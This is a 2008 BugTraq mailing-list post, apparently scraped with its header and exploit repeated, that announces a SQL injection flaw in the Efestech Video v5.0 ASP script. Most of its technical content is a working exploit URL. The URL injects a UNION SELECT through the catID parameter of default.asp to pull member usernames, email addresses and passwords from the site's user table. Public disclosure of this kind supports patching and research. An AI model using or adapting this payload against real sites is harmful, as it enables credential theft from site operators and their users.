BugTraq
Back to list
|
Post reply
Efestech Video v5,0 (id) Remote Sql Injection
Mar 29 2008 08:13PM
dj_remix_20 hotmail com
#####################################################################
$Author : RMx
$Mail : RM-x (at) Msn (dot) com [email concealed]
$Homepage : Coderx.org
$Script name :Efestech video v5.0
$Script download :http://www.aspindir.com/goster/4835
$Script Sales : Free
$Thanks : Ex-47 , TR_IP
####################################################################
$Vulnerable file :
Default.asp
$Vulnerable code :
id parameters cannot filter...
$Exploit :
http://www.hedefsite.com/[path]/default.asp?catID=-1%20union%20select%20
0,kullanici,eposta,3,4,5,sifre,7,8,9,10,11,12,13%20from%20uyeler
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
$Author : RMx
$Mail : RM-x (at) Msn (dot) com [email concealed]
$Homepage : Coderx.org
$Script name :Efestech video v5.0
$Script download :http://www.aspindir.com/goster/4835
$Script Sales : Free
$Thanks : Ex-47 , TR_IP
####################################################################
$Vulnerable file :
Default.asp
$Vulnerable code :
id parameters cannot filter...
$Exploit :
http://www.hedefsite.com/[path]/default.asp?catID=-1%20union%20select%20
0,kullanici,eposta,3,4,5,sifre,7,8,9,10,11,12,13%20from%20uyeler
[ reply ]